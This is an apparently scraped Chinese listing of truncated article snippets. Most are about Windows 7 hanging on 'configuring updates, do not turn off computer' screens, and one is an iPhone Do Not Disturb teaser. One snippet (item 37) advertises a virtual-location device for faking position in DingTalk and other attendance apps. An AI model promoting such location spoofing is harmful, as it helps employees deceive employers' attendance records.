    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  37. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  38. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  39. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  40. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  41. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  42. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  43. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  44. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  45. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57